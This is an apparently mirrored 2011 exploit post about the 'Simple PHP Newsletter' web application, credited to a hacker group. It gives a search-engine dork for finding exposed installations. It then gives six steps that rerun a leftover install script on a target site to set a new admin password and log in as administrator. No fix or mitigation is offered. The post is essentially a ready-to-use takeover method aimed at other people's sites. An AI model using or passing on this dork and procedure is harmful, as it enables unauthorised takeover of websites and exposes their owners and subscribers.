Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:26029
HistoryMar 31, 2011 - 12:00 a.m.

"Simple PHP Newsletter" Remote Admin Password Change With install path

2011-03-3100:00:00
vulners.com
25

#####################################################################################

"Simple PHP Newsletter" Remote Admin Password Change With

install path

#####################################################################################

Author: alieye

class : remote

E-mail: [email protected]

greetz: C.S.Eye Security Team members

We Are: Alieye , Z0d14c , Bully13 , Stanly , Safety & All Iranian Hackers

Site : www.gcmt.vcp.ir , blog : www.cseye.blogfa.com

#####################################################################################

download : http://quirm.net/download/23/

Dork : intitle:"News list Administration panel" or "Simple PHP Newsletter"

Example :

  1. Go to url : target.com/newsletter/admin.php or target.com/mailer/admin.php

  2. Clean admin.php and Go to target.com/newsletter/install/install1.php or target.com/mailer/install/install1.php

  3. Write new password for admin and click next stage

  4. finish install

  5. Go to url : target.com/newsletter/admin.php or target.com/mailer/admin.php

  6. Login admin with new password

Date : 03/29/2011